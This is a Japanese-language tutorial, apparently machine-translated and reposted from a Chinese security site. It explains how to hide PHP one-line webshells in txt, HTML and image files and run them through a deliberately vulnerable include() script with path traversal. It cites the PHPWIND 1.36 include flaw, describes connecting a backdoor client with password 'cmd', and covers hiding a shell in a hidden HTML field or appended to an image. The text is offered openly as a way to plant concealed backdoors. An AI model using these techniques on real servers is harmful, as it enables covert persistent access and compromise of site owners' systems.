最近、多くの友人が、私の一文のトロイの木馬を HTML や画像に隠すことができるかどうか私に尋ねてきました。実際、HTML ファイルや画像に一文のトロイの木馬を挿入することはすでに非常に隠されています。 , 続いて、この記事のテストレポートを読んでください。 PHP は拡張子 php を持つファイルのみを解析するため、PHP ステートメントをイメージに挿入しただけでは実行されないことを知っておく必要があります。したがって、画像に隠された PHP ステートメントを実行できる必要があります。 PHP の呼び出し関数 (include、require など) を使用するだけです。
数日前にトロイの木馬を写真に隠すという記事を私たちはまだ覚えています。つまり、PHP ファイル内で include("x.gif") などのステートメントを使用して、画像に隠されたトロイの木馬ステートメントを呼び出します。 ASP のステートメントも同様です。非常に隠されているように見えますが、イメージを直接呼び出すと、PHP について少し知っている人であれば、怪しいものを見つけるのは難しくありません。 URL の GET メソッドではパラメータを渡すことが難しいため、トロイの木馬挿入のパフォーマンスを最大限に活用できません。
PHP では Include 関数が頻繁に使用されるため、セキュリティ上の問題が多すぎます。たとえば、PHPWIND1.36 の脆弱性は、include の背後にある変数のフィルタリングが不足していることが原因です。これから、同様のステートメントを構築して PHP ファイルに挿入できます。次に、トロイの木馬を画像または HTML ファイルに隠します。これは、より隠蔽性が高いと言えます。たとえば、PHPWIND フォーラムに次のステートメントを挿入します。 一般管理者は参照できません。
インクルード関数の助けを借りて、txt、html、画像ファイルなどのさまざまな種類のファイルに PHP トロイの木馬を隠すことができます。 txt、html、画像ファイルの 3 種類のファイルはフォーラムや記事システムで最も一般的であるため、以下の順序でテストを実行します。
まずPHPファイルtest.phpを作成します ファイルの内容は、
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txtファイルは通常、説明ファイルなので、ディレクトリの説明ファイルに一文のトロイの木馬を入れれば問題ありません。 TXT ファイル t.txt を作成するだけです。一文のトロイの木馬を t.txt ファイルに貼り付けます。次に、 http://localhost/test/test.php?test=../t.txt にアクセスします。 t.txt の内容が表示されれば、OKです。 Lanker mini PHP バックドア クライアントのトロイの木馬アドレスを http :/ に追加します。 /localhost/test/test.php?test=../t.txt パスワードに cmd を追加するだけで、実行によって返される結果を確認できます。
HTMLファイルの場合、通常はテンプレートファイルです。 HTML ファイルに挿入されたトロイの木馬を表示せずに呼び出して実行できるようにするには、次のように HTML に隠し属性を持つテキスト ボックスを追加します。 その後、上記と同じ方法を使用します。実行によって返される結果は、通常、ソース ファイルを表示することで確認できます。 たとえば、このプログラムのディレクトリを表示する機能を使用します。 C:Uniserver2_7swwwtest としてディレクトリを取得できるので、ソース ファイルの内容を表示します。
次に、写真ファイルについて話しましょう。最も有害な手口は、写真の中にトロイの木馬を隠すことです。画像を直接編集して画像の最後に挿入することもできますが、テスト後は通常、画像には影響しません。次に、同じ方法でクライアントのトロイの木馬アドレスを追加します
PHP 環境変数をチェックすると、返される結果は元のイメージです。
実際には、コマンドは実行されましたが、返された結果は表示されません。それが正しいかどうかを証明します。 コマンドを実行した後、ファイルのアップロード コマンドを実行します。予想どおり、ファイルはサーバーに正常にアップロードされました。このような偽造の利点は、それがよく隠蔽されることです。言うまでもなく、欠点は応答がないことです。返された結果を確認したい場合は、メモ帳を取り出して偽の画像ファイルを作成します。
この時点で、テストは基本的に完了しました。PHP バックドアを非表示にする方法はあなたの選択次第です。急いで書いたので、間違っているところがあればご指摘ください!
http://www.bkjia.com/PHPjc/446974.html